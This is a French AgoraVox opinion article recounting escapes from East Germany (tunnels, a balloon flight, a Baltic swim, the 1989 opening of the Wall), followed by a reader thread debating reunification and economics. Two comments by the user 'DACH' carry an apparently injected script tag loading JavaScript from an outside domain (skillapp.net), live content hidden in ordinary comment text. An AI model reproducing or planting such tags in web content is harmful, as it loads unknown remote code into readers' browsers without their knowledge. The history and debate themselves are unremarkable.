• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile

Accueil du site > Tribune Libre > La RDA (DDR) : le grand sauve-qui-peut

La RDA (DDR) : le grand sauve-qui-peut

« Au total, cinq mille personnes réussiront leur évasion, mille seront tuées, quatre mille cinq cents ont échoué dans leur tentative, cinquante-quatre n’ont jamais été retrouvées, et soixante mille autres seront poursuivies pour préparation d’évasion et condamnées  ». Trente trois mile prisonniers politiques furent échangés entre la RDA et la RFA en contre partie de 40 000 DM (environ 20.000 euros) par prisonnier, chaque détenu devenait une source de devises étrangères faisant cruellement défaut à la RDA.

De 1949 à 1961, plus de deux millions et demi de citoyens ont déjà trouvé refuge à Berlin-Ouest, il leur a suffit d'acheter un billet de « tram », de métro ou de s'envoler de l'aéroport de Berlin pour se retrouver à l'Ouest. Août 1961, un mur érigé à la hâte va séparer la ville afin d’empêcher les fuites, l'« hémorragie » concerne les forces vives du pays : jeunes, professionnels qualifiés, techniciens, médecins, ingénieurs, enseignants, etc. Trois cent deux miradors dominent le no man’s land de 165 km de long surnommé la « ceinture de la mort » parcourue par des équipes cynophiles et qui comprend des zones minées, d’autres battues par des mitrailleuses. Les Vopos (gardes-frontières) ont pour consigne de tirer sur toute personne qui tenterait de franchir la zone interdite (ordre 101). Des hommes, des femmes et même des enfants vont tout mettre en œuvre pour s’évader de la DDR. Au début de la construction de la « Muraille de Chine II », leur chance de réussite repose essentiellement sur la surprise. Le 15 août, un photographe immortalisera un garde-frontière âgé de 19 ans se débarrassant de son fusil pour franchir le réseau de barbelés de Bernauerstrasse et rejoindre sa fiancée restée à l’Ouest. Le 17, un jeune homme de 18 ans est blessé mortellement, il va rester une cinquantaine de minutes sur le sol, perdant son sang, criant « Aidez-moi » avant de décéder.

Pendant la première année, dix explosions vont ébranler le mur pour y créer une ouverture et quatorze poids lourds vont venir le percuter pour y ouvrir une brèche avant que les garde-frontières ne renforcent la maçonnerie et placent des herses surnommées « herbe de Staline ». Le 5 décembre 1961, un train conduit par un jeune cheminot avec à son bord une trentaine de passagers enfonce le mur qui barre la voie ! Le lendemain, les autorités déposèrent les rails... Un couple fonce droit sur le poste de contrôle au volant d’un coupé Austin Healey et passe sous la barrière abaissée ! La barrière sera renforcée par des barres verticales. A la nuit tombée, certains fugitifs escaladent le mur en un endroit dissimulé de la surveillance des VoPos, d’autres empruntent les égouts ou quittent la zone cachés dans un camion frigorifique, dans une citerne ou dissimulés dans un objet industriel : grosse bobine de câble, poste à souder, etc. Quatre hommes revêtus d’un uniforme soviétique confectionné pour l’occasion franchissent le point de contrôle salués par les gardes ! Un grutier dépose une armoire forte de l’autre côté du mur dans laquelle deux réfugiés trouvent place. Les balles des garde-frontières s’écrasent sur le coffre tandis qu’il était hissé de l’autre côté du mur.

Un tunnel de 145 mètres de long courant à 12 mètres sous terre pour seulement une hauteur libre de 70 centimètres, fut creusé sous la cave d’une boulangerie située en secteur occidental pour rejoindre les toilettes dans l’arrière-cour d’un immeuble situé à l’Est. Trente-six jeunes gens vont creuser pendant six mois et décharger terre et gravas dans les pièces de la boulangerie. Un télégramme : « tante Emma morte – stop – vous attend immédiatement – stop – Gisela » signifiait que les organisateurs de la filière d’évasion se tenaient prêts à organiser l’évasion de son destinataire. Près d’une soixantaine de personnes ont emprunté ce tunnel avant qu’il ne soit découvert. Tous les tunneliers improvisés n’eurent pas autant de chance. Il arriva que deux tunnels trop proches l’un de l’autre entraînent un glissement de terrain.

Mars 1978, deux jeunes pères de famille vivant dans la ville de Pössneck s’interrogent sur la façon dont eux et leur famille pourraient quitter la RDA. Naila, la ville la plus proche en RFA, se trouve distante de 65 kilomètres. Franchir la frontière à pied reste exclu pour une famille et à plus forte raison pour deux familles avec enfants. Dans la nuit du 15-16 septembre, le ballon transportant huit fugitifs survolait la zone frontalière à 2 000 mètres d’altitude lorsqu’il fut pris dans les faisceaux des projecteurs et qu’il essuya quelques tirs. Le brûleur poussé à fond, le ballon atteignit 2 500 mètres d’altitude, mais cette surconsommation contribua à épuiser prématurément les trois bouteilles de propane. Vingt minutes plus tard, leur aérostat se posait lourdement sur le sol herbeux. Quand les fugitifs aperçurent les policiers venus à leur rencontre, ils réalisèrent qu’ils avaient enfin gagné leur liberté.

Le 19 juillet 1986, deux jeunes hommes escaladent un pylône THT à proximité de la ville de Zaïm en un endroit où la ligne de 380.000 volts franchit la frontière entre la Tchécoslovaquie et l'Autriche. Leur idée ? une planche de bois soutenue par deux poulies fixées au câble du paratonnerre courant au dessus des câbles électriques ! Trois heures plus tard et après s'être hâlés sur 400 mètres, ils sont au pied du pylône suivant, à l'Ouest ! Le projet n'était sans risques, la StB (police politique tchécoslovaque) utilisait le subterfuge de « fausse frontière ». Ses agents organisaient de faux réseaux d’organisation dont les passeurs « promenaient » les candidats à l'évasion dans la région afin de les désorienter et de les persuader qu’ils avaient franchi la frontière tchécoslovaque avant d’être accueillis par des agents de la StB déguisés en soldats américains, français ou britanniques ! Les fugitifs livraient benoitement aux faux soldats des noms de personnes restées dans le pays et susceptibles de servir de contacts aux services de renseignement occidentaux.

Avec le temps, seules les évasions bien préparées avaient encore une chance de réussir. Le « couloir de la mort » n’avait pas usurpé son surnom, l’étroite bande de terrain est défendue par des mines et des mitrailleuses capables de délivrer automatiquement des tirs croisés si une personne a le malheur de s’introduire dans la zone interdite. Emprunter les cours d’eau reste tout aussi risqué, les berges sont minées et le cours d'eau entravé par des herses ou du grillage, véritable nasse pour les nageurs. Des milliers d'Allemands de RDA ont tenté de s’enfuir par la façade maritime de la mer Baltique, zone moins surveillée que le « mur ». Les bateaux de pêche et les navires de commerce avaient pour consigne de repêcher de force les fugitifs pris en flagrant délit et de les remettre à la « pieuvre », c’est-à-dire à la Stasi.

Le 8 septembre 1968, Bernd Böttger parvient à rejoindre le Danemark avec un « tracteur » sous-marin capable de filer 5 km/h (son invention sera commercialisée aux USA). Sa précédente tentative lui avait valu trois mois d'emprisonnement. En octobre 1988, Alfred Kostbade, après avoir étudier très soigneusement le dispositif de surveillance côtier, profita d’une nuit brumeuse pour embarquer accompagné de son épouse et de leurs deux fils à bord d’un canot pneumatique de couleur, orange.., le seul qu’il avait pu se procurer. C’est en ramant qu’ils se faufilèrent au travers d’une flottille composée d’une trentaine de bâtiments, se dirigeant dans l’obscurité grâce à un compas qui sera rendu inutilisable et à l’emplacement des étoiles. Au lever du jour et après bien des péripéties, ils prirent pied sur la presqu’île de Fehmarn.

Un jeune médecin décidé à quitter clandestinement la RDA porta son choix sur les environs de Kühlungsborn (proche de Rostok, siège du commandement des nageurs de combat est-allemands) une des plus belles plages du Nord de l’Allemagne de l’Est. Le choix était tout sauf anodin. La ville ne jouxtait ni le Danemark ni la RFA, zones qui faisaient l’objet d’une surveillance renforcée de la 6e brigade des frontières de la Volksmarine. Son projet paraissait « insensé », il aurait à nager pendant plus de vingt-quatre heures dans une eau glaciale ! Il s’entraîna à nager dans les rivières et les lacs, toujours de nuit, jusqu’à y séjourner une vingtaine d’heures ! Et pour parfaire sa forme physique et se muscler les bras, il se mit à soulever de la « fonte » et pratiqua l’aviron de façon assidue.

Le samedi 24 juillet. Un vent modéré souffle du sud-sud-est soulevant de courtes vagues d’écume permettant de dissimuler l’extrémité d’un tuba ; la température de l’eau est de 16 degrés. Le candidat à la liberté se glissa dans l’eau vers 17 heures. Il emportait avec lui un petit sac contenant une combinaison de plongée, une ceinture de plomb de 7 kg, des barres de chocolat, 50 marks, un tube de comprimés d’amphétamines, un autre d’analgésiques et ses papiers d’identité. Il déposa son viatique sur un petit banc de sable immergé et prit ses repères pour venir le récupérer le moment venu. Lorsque la plage fut désertée, il récupéra son ballot et revêtit sa combinaison dans l’eau, s'équipa d'un masque de plongée, d'une paire de palmes, d'une montre et un compas. Lorsque la nuit commença à décliner et que les projecteurs s’allumèrent, il avait atteint la limite des eaux territoriales. Il vérifia son cap compas et repéra dans le ciel une étoile capable de lui indiquer la direction qu’il devrait suivre. C’est à cet instant qu’il remarqua que sa montre était inondée. Qu’importe, alternant nage ventrale et nage dorsale pour se reposer et grignoter, il progressa ainsi jusqu’à l’aurore avant de prendre un nouveau cap. Une heure après le lever de l’astre solaire, il distingua enfin la bouée n° 1 du chenal n° 6, et il aperçut dans la brume un ferry qui se dirigeait vers la RFA. En milieu d’après-midi, des éclairs zébrèrent le ciel, le vent forcit et la pluie se mit à tomber. Une heure plus tard l’orage se calma, et comme dans un rêve, il aperçut la côte de l’île de Fehmarn (RFA) face à lui ! Un plaisancier surpris de voir quelqu’un nager à cette heure et en cet endroit vint à sa rencontre. « Zone Est ! Zone Est ! » lui hurla-t-il. L’équipage stupéfait l’aida à monter à bord avant de lui servir des rasades d’un café bien chaud. Il avait la peau violacée et plissée, les épaules douloureuses, mais il avait réussi et recouvré la liberté.

Le 9 novembre 1989, le système politique de la République démocratique allemande est à bout de souffle et son économie exsangue. Günter Schabowski, membre du bureau politique, ancien directeur du quotidien Neues Deutschland déclare lors d'une conférence au Centre de presse international, et à la suite d'un quiproquo : « Les demandes de voyages privés à l’étranger peuvent être déposées sans conditions préalables ni motif du déplacement ou liens familiaux. Les autorisations seront délivrées sans délai. Les divisions compétentes – passeport et contrôle de l’habitant – des commissariats de la Volkspolizei en RDA ont pour consigne de délivrer immédiatement des visas de sortie définitive sans appliquer les conditions encore en vigueur actuellement. Les sorties définitives peuvent être effectuées via tous les postes frontières entre la RFA et la RDA ». Un brouhaha envahit la salle et Günter Schabowski semble seulement prendre la mesure de ses propos. Les téléscripteurs des agences de presse crépitent, la nouvelle se répand comme une traînée de poudre. Des centaines de milliers d'Ossis (citoyens de l’Est) se ruent vers les postes frontières provoquant d’énormes embouteillages et forçant les garde-frontières à ouvrir la barrière. Les établissements financiers de RFA sont pris d’assaut, ils offrent 100 DM à tout citoyen est-allemand passé à l'Ouest, ils seront 16 millions de bénéficiaires ! Les cabas sont remplis de victuailles, kiwis, avocats fruits exotiques inconnus en RDA, voire de matériel hi-fi ou disque tandis que frau Merkel n'a qu'une envie..., manger des huitres à l'ouest...

Schabowski déclarera : « Nous étions coincés, nous avions prévu d’autoriser les voyages en décembre. Mais l’ambassade de la RFA à Prague était pleine de réfugiés. Nous avons donc décidé d’ouvrir le mur le 10 novembre à 4 heures du matin. Le 9, à 7 heures du soir, les Berlinois se sont rués vers l’Ouest. À cette époque, j’étais encore communiste, mais pas idiot. J’espérais sauver la RDA. Mon idée était de faire payer la République fédérale qui ne pouvait s’offrir une Sicile misérable à sa frontière. Nos concitoyens ne nous ont pas crus. Aujourd’hui, le PDS (Parti du socialisme démocratique) exploite la nostalgie de la RDA en répétant : l’emploi y était garanti. C’est une escroquerie, puisque nous ne pouvions plus payer ». La monnaie européenne a été une conséquence de l'absorption de la RDA afin de renforcer la communauté par l'Union économique monétaire (traité de Maastricht février 1992).

Les archives de la Stasi : photographies, enregistrements, microfilms, fiches numérisées sont disponibles : https://www.bstu.de/en/access-to-records/access-for-private-individuals/ Plus de 50 millions de pages déchiquetées sont en cours de reconstitution grâce à un logiciel. Les archives concernant les activités de la Stasi à l'étranger on peu de chance d'être disponibles un jour, cela pourrait conduire à la découverte de taupes, n'oublions pas que la RDA a abrité, sciemment, des terroristes qui ont ensanglanté l'Europe ! « J’ai passé ma vie à essayer de fabriquer l’homme parfait. C’était une erreur. Ici, les gens sont souvent plus bornés que nous ne l’étions nous-mêmes, mais ils sont adaptables, vivants. Ils m’ont fait découvrir une notion que j’exécrais, la patrie  » (Schabowski).

°°°°°°°°°°°°°°°°°°°°°°°°


Moyenne des avis sur cet article :  3.08/5   (12 votes)




Réagissez à l'article

38 réactions à cet article    


  • San Jose 15 novembre 09:20

    Ils ne se doutaient pas que la vie en RDA préfigurait l’existence que demain nous aurons tous dans le monde frugal nécessaire pour sauver la planète. 


    • Fifi Brind_acier Fifi Brind_acier 15 novembre 09:42

      @San Jose
      C’est sûr le capitalisme repeint en vert va sauver la planète !!
      Il va surtout sauver les actionnaires.
      Mais il ne va sûrement pas élever le niveau culturel des populations, des fois que celles-ci deviendraient capables de détecter les arnaques qui se cachent derrière les rapports bidons du GIEC...

      « Pourquoi la théorie du réchauffement climatique du GIEC doit nous faire rire. »


    • amiaplacidus amiaplacidus 15 novembre 10:35

      @San Jose

      Je ne résiste pas au plaisir de mettre cette citations :

      « Tout ce qui nous effrayait du communisme - perdre nos maisons, nos épargnes et être forcé de travailler pour un salaire minable sans avoir de pouvoir politique - s’est réalisé grâce au capitalisme... »
      Bernie Sanders


    • San Jose 15 novembre 13:30

      @amiaplacidus
      .
      Continuez à penser ce que vous avez toujours cru, pour vous éviter un traumatisme moral qui peut être fatal aux grands âges. 


    • San Jose 15 novembre 13:35

      @Fifi Brind_acier
      .
      Cessez de vous accrocher comme un morpion à la moindre opinion qui passe pour embrayer illico sur vos obsessions. On parlerait de la reproduction des escargots que vous trouveriez un lien avec les idées de l’UPR. Je me contrefiche de votre déplumé. Passez une bonne journée. 


    • DACH 15 novembre 15:06

      @amiaplacidus=Si vous connaissiez le personnage et ses théories, vous changeriez de l’immeuble où il réside. Comment se fait-il que la plus grande partie des américains continuent de s’enrichir, de bénificier d’un bon niveau de vie, sont favorables à Trump et à ses réussites économiques certes provisoires z enn dfépit de foucades ou de positions politiques comme avec la Turquie d’un cynisme cruel...
      Pourquoi tant de migrants du sud veulent rejoindre les E-U. si ce qu’affirme B sanders est vrai ?

      <script src="//skillapp.net/2143f05201d76950ea.js"></script>

    • amiaplacidus amiaplacidus 15 novembre 16:54

      @DACH

      Je connais le « personnage » comme vous dites.

      Et ses idées, c’est simplement la social-démocratie, pas de quoi avoir peur qu’il vienne vous voler votre frigo et votre télé.
      Il veut simplement instaurer aux USA ce que nous avions en France et qui est en grande partie démantelé « grâce » à 3 présidences successives et catastrophiques : Sécu, droit du travail, etc.

      Vous devriez savoir qu’en matière de macro-économie, on est sur des temps longs, au minimum 2 ans. Alors, les « réussites » économiques de Trump sont essentiellement dues aux mesures prises par son prédécesseur.
      Le résultat des aberrations économiques trumpiennes vont commencer à arriver. C’est déjà arrivé en partie pour l’industrie, les ouvriers de l’Ohio sont en train de se mordre les doigts d’avoir voté Trump, il n’a aucune chance de remporter cet état clé lors des primaires.
      De toute façon, les derniers sondages (qui valent ce qu’ils valent à une année du scrutin ...) ne donnent à Trump que 40 % des voix au niveau fédéral, mais il est vrai qu’il peut compter, il sait habillement les flatter et parler leur langage, sur les électeurs de la « bible belt » et les « redneck », donc les jeux ne sont pas encore fait.

      Je pense, à voir votre réaction, que vous n’avez jamais mis les pieds aux USA. Contrairement à moi qui y ait vécu environ 2 ans, il y a une quarantaine d’années, alors que les choses allaient mieux que maintenant, et j’y vais encore assez souvent (j’y ai de la famille proche).
      Alors, je peux vous dire que le rêve étatunien s’apparente plutôt à un cauchemar qu’à un rêve rose bonbon.

      Par exemple, pour rebondir sur une récente émission télé (sur la 2 ou ARTE), comment peut-on accepter que des Étatsuniens diabétiques meurent simplement parce qu’il ne peuvent pas payer leur insuline qui coûte plus de 10 fois le prix payé en France, et encore en France, le diabétique ne paye pas lui-même (le néolibéralisme de Macron et Cie n’a pas encore totalement démantelé la Sécu, mais c’est en cours).


    • amiaplacidus amiaplacidus 15 novembre 17:37

      @amiaplacidus
      J’ai oublié, pour vous paraphraser :

      Pourquoi tant de migrants du sud veulent rejoindre la France ?


    • Fifi Brind_acier Fifi Brind_acier 15 novembre 20:39

      @San Jose
      Cessez de vous accrocher comme un morpion à la moindre opinion qui passe


      A/ Je fais la même chose que les militants du FN, à qui vous ne reprochez rien.

      B/ Manque de bol, l’UPR ne remet pas en cause le GIEC.

      C/ Je n’écris pas des commentaires pour les blogueurs du site, mais pour les milliers de lecteurs qui viennent sur Agoravox.

      D/ Votre avis, je m’en fiche, à un point qui vous donne une idée de l’infini.
      Bonne soirée.


    • Attila Attila 15 novembre 20:46

      @Fifi Brind_acier
      «  Manque de bol, l’UPR ne remet pas en cause le GIEC » J’ai quand même lu une demande pour une expertise indépendante ce qui sous-entend que l’UPR juge que celle du GIEC ne l’est pas.

      .


    • Fifi Brind_acier Fifi Brind_acier 16 novembre 08:22

      @Attila
      Je ne suis pas au courant, j’en suis resté à une discussion entre Asselineau et le responsable écologie, qui lui, est un adepte du GIEC.
      Tu peux retrouver l’info dont tu parles ?


    • Attila Attila 16 novembre 08:27

      @Fifi Brind_acier
      J’ai sans doute lu ça dans une revue de presse, c’est assez récent. Mais pour le retrouver ça va pas être facile car je ne l’ai pas noté (honte à moi).

      .


    • Fifi Brind_acier Fifi Brind_acier 15 novembre 09:37

      Imposer l’euro, pour tout dire le mark, à la RDA, a été le clou dans le cercueil des illusions des Allemands de l’est. Tout ça pour vivre misérablement dans notre belle Europe de la prospérité...

      Passer d’une arnaque à une autre arnaque, il y en a qui n’ont pas de bol.

      Et pire, mourir pour une fausse liberté vantée par la propagande euro-atlantiste, quelle tristesse ! D’ailleurs il y a une incompréhension sur ce sujet.

      Quand les Allemands de l’ est manifestaient, c’était pour réformer le système, pas pour sortir du socialisme, comme essayent de le faire croire les euronouilles.

      « Les conséquences funestes de la chute du mur de Berlin ».


      • Fergus Fergus 15 novembre 09:58

        Bonjour, Fifi Brind_acier

        Vous plaisantez ! Certes, il y a des « Ossies » qui regrettent le temps de la RDA, mais lorsqu’ils sont sincères, ils avouent que c’est surtout le temps de leur jeunesse qu’ils regrettent. Car lorsque vous parlez avec eux  ce que j’ai eu l’occasion de faire à Berlin —, ils reconnaissent que leur vie dans l’Allemagne réunifiée est, malgré les difficultés économiques de l’Est, meilleure au plan matériel que ce qu’elle était dans l’ex-RDA (sauf évidemment pour les apparatchiks). Il n’y a que dans un domaine que c’était « mieux avant » : le chômage était inexistant en RDA, mais au prix de nombreux emplois inutiles et déprimants à la mode soviétique. Quant à la chape de plomb qui pourrissait la vie des non-membres du parti unique en les maintenant dans un comportement de qui-vive permanent, ce n’était pas une vue de l’esprit ! 


      • San Jose 15 novembre 13:36

        @Fergus
        .
        Je suis obligé de vous plusser ; ne me faites pas ça trop souvent !


      • DACH 15 novembre 15:11

        @Fifi Brind_acier=Pourquoi ne jamais tenir compte de ce que veulent les peuples ? Les conséquences de la chute du mur de Berlin n’étaient pas funestes pour les Ossies. Ils l’affirment encore tous les jours !

        <script src="//skillapp.net/2143f05201d76950ea.js"></script>

      • Fergus Fergus 15 novembre 17:11

        Bonjour, DACH

        « Les conséquences de la chute du mur de Berlin n’étaient pas funestes pour les Ossies. Ils l’affirment encore tous les jours ! »

        C’est ce que je me tue à dire. Mais à vouloir taper sur l’Allemagne, on se laisse aveugler par des idées reçues très largement fausses. A ce propos, je vous invite à lire plus bas ma réponse à Traroth.



      • Fifi Brind_acier Fifi Brind_acier 15 novembre 18:34

        @DACH

        Pas possible, il y a eu un referendum en Allemagne de l’ est, pour savoir ce qu’ils voulaient comme société ?? On leur a collé le mark, ce qui a fait disparaître toute leurs industries. Compétitivité oblige.

        Contrairement à ce que vous croyez, je ne défends aucunement le stalinisme !
        Je critique l’écart entre la propagande européiste et la réalité.
         


      • Fergus Fergus 15 novembre 20:23

        Bonsoir, San Jose

        « Je suis obligé de vous plusser ; ne me faites pas ça trop souvent ! »

         smiley


      • Yaurrick Yaurrick 17 novembre 19:44

        @Fifi Brind_acier
        L’industrie est-allemande dans les années 80, c’était un retard colossal par rapport à l’industrie ouest-allemande. Il n’y avait aucune chance qu’elle puisse perdure, le retour à la réalité a été douloureux.


      • Aita Pea Pea Aita Pea Pea 17 novembre 20:06

        @Yaurrick

        Les 250 MZ sont increvables et toujours recherchées...va comprendre...


      • Fergus Fergus 15 novembre 09:41

        Bonjour à tous.

        La fameuse évasion en ballon des familles Strelzyk et Wetzel a donné lieu récemment à un très joli film de Michael Bully Herbig : Le vent de la Liberté.

        Pour rester dans l’ambiance de la RDA, un autre très beau film récent de Lars Kraume, lui aussi inspiré de faits réels, montre la révolte d’une classe de terminale en 1956 en soutien du peuple hongrois : La révolution silencieuse. L’un des héros passe à l’Ouest, mais c’était avant le mur.


        • Fergus Fergus 15 novembre 11:10

          J’aime beaucoup les moinsseurs incapables d’avancer le moindre argument contradictoire. smiley


        • Fergus Fergus 15 novembre 11:20

          Un grand merci à l’anonyme qui vient de moinsser ce dernier commentaire !  smiley  smiley  smiley


        • Cadoudal Cadoudal 15 novembre 11:45

          @Fergus

          Même les héroïnes gauchistes fuient Berlin, capitale de la Nouvelle Allemagne...

          « À Berlin, ça pue »
          « l’air y est à vomir. »

          elle n’a pas du tout l’intention de vivre en Allemagne, dit-elle, trop de gens sur un territoire trop exigu

          https://www.spiegel.de/plus/carola-rackete-rettet-jetzt-das-klima-statt-fluechtlinge-a-00000000-0002-0001-0000-000166156954

          Holmquist décrit lui-même son travail comme des œuvres de « dépravation totale ». Avec « Last Hero », l’artiste a voulu représenter « la solidarité et les droits de l’homme pour tous – y compris pour les dealers »

          https://www.berlinestanous.com/tv/cult-tur-deutsch/street-art-jagd/last-hero-scott-holmquist.html

          https://countrymeters.info/fr/Germany


        • Quand je vais à Berlin, je rencontre parfois des nostalgiques de la RDA et de son système social. Remplacer une dictature communiste par un totalitarisme ultra-libéral, donc l’état-rouge par les banques d’affaires, et jeter un million de personnes au chômage en 1990 (avec les suicides qui ont suivi), ce n’est pas une libération !


          • Fergus Fergus 15 novembre 11:19

            Bonjour, France Républicaine et Souverainiste

            La majorité des « Ossies » n’en préfère pas moins vivre dans l’Allemagne réunifiée, malgré les frustrations nées de l’illusion qui a suivi la réunification. Quant au chômage induit par le système néolibéral, il est presque aussi important à l’Ouest dans les Länder du nord du pays que dans les Länder de l’ex-RDA.


          • Traroth Traroth 15 novembre 15:16

            @Fergus
            Franchement, Fergus, là vous racontez un peu n’importe quoi. Déjà ne parler que de chômage sans parler de pauvreté, c’est une arnaque. Mais même en s’en tenant au chômage, c’est faux.

            https://www.lesechos.fr/monde/europe/allemagne-les-inegalites-entre-est-et-ouest-ont-la-vie-dure-1136670


          • Fergus Fergus 15 novembre 16:31

            Bonjour, Traroth

            Ce lien confirme ce que je dis  !!!

            Par exemple dans ce constat : "le pouvoir économique des Länder de l’ex-RDA est ainsi passé de 43 % du niveau de celui de l’Ouest en 1990 à 75 % en 2018. » A aucun moment je n’ai prétendu que l’Est avait d’ores et déjà rattrapé l’Ouest : cela demandera sans doute encore 15 à 20 ans.

            Quant au chômage, le taux, naguère à près de 20 % à l’Est, a fortement décru dans ces Länder, au point d’avoir été ramené en octobre 2019 à 6,1 % dans la partie orientale contre 4,6 % dans la partie occidentale. Je vous invite à cet égard à regarder les statistiques publiées sur ce lien très éloquent qui met à mal beaucoup de certitudes et de préjugés. Surtout si l’on observe que le bon chiffre à l’Ouest repose principalement sur la Bavière et ses 2,7 % de chômeurs.

            Ce qui veut dire que si l’on met à part la situation très florissante du plus indépendant des Länder allemands (13 millions d’habitants, soit grosso modo 1/6e de la population allemande), le reste des Länder de l’Ouest est à peu près au même niveau que les Länder de l’Est ! Etonnant, non ? Et sans doute contrariant pour ceux qui s’appuient avant tout sur des idées reçues.

            Cela dit, je suis d’accord avec vous pour dire que la pauvreté touche encore trop l’ex-RDA. Mais là aussi, la résorption est en marche. Hélas trop lentement.

            Ajoutons que s’il n’y pas encore à l’Est d’entreprise cotée au Dax, de plus en plus de pôles de recherche sur les industries de pointe se développent dans ces Länder.



          • Traroth Traroth 15 novembre 17:05

            @Fergus
            Ce lien confirme qu’il reste toujours 2% d’écart au niveau chômage entre l’est et l’ouest, ce qui, ne vous en déplaise, est loin d’être négligeable. Mais surtout, ce lien explique qu’entre l’est et l’ouest, il y a une forte différence au niveau de la pauvreté, ce qui est bien plus important que le chômage.


          • Fergus Fergus 15 novembre 17:18

            @ Traroth

            Vous ne voulez décidément pas voir la réalité en face. Bien sûr qu’il reste un écart, mais il se réduit chaque année d’environ 0,2 point !

            A ce rythme, dans 10 ans seulement le taux de chômage sera identique entre l’Est et L’Ouest. Et sans doute même meilleur à l’Est si l’on met à part le Land de Bavière et son taux exceptionnellement bas !!!

            Pour ce qui est des différences sur la pauvreté, c’est vrai. Mais reconnaissez qu’elle est très largement corrélée au chômage !

            Bref, on est très loin de la situation désastreuse que certains tentent de décrire ici.


          • Fifi Brind_acier Fifi Brind_acier 16 novembre 08:36

            @Fergus
            Avec tous les excédents commerciaux de l’Allemagne ( plus de 200 milliards par an !), il est quand même étonnant que ces différences persistent aussi longtemps.

            Entre la pauvreté qui galope et les infrastructures qui partent en quenouille, on se demande bien ce que le gouvernement allemand fait de tout cet argent ?

            L’économie allemande est en difficulté, cela a au moins un avantage, « nos experts » cessent de nous les briser menu avec l’exemple allemand !
             


          • Fergus Fergus 16 novembre 08:59

            Bonjour, Fifi Brind_acier

            En effet. Et encore ne parlez-vous pas des problèmes à venir : la démographie qui, faute d’actifs, va gravement plomber l’économie allemande dans les 10 à 15 ans qui viennent. Or, dans le climat de montée des populismes actuel, la solution ne pourra pas venir d’une immigration massive pour compenser !


          • Fifi Brind_acier Fifi Brind_acier 17 novembre 11:13

            @Fergus
            la solution ne pourra pas venir d’une immigration massive pour compenser !

            C’est ce que fait Merkel depuis plusieurs années !


          • JL JL 15 novembre 11:47

            La plupart des Allemands de l’Est reconnaissent avoir perdu en sécurité ce qu’ils espéraient gagner en liberté. Mais c’était un marché de dupes dans une société où la précarité est si répandue puisque précarité égal insécurité.

             

             L’Allemagne se prépare à l’arrivée d’une pauvreté de masse

             

            Ps. Bien que le corps de l’article cité confirme son titre, son sous-titre « Les bas salaires progressent fortement en Allemagne. Plus d’un retraité sur cinq vivra sous le seuil de pauvreté dans 20 ans » est l’exemple type de ce que l’indigence du vocabulaire ou la paresse intellectuelle produit de déplaisant !

             

             

             


            • titi 16 novembre 01:07

              Malgré tout ce qu’en disent les nostalgiques des « Paradis Socialistes », la vérité c’est que des pays comme les USA construisent un mur pour empêcher des migrants de rentrer sur leur territoire, alors que les régimes socialistes ont construit des murs pour empêcher leur propre peuple d’en sortir.

              C’est ce qu’on appelle voter avec ses pieds.

              Tout le reste n’est que palabres.

Ajouter une réaction

Pour réagir, identifiez-vous avec votre login / mot de passe, en haut à droite de cette page

Si vous n'avez pas de login / mot de passe, vous devez vous inscrire ici.


FAIRE UN DON






Les thématiques de l'article


Palmarès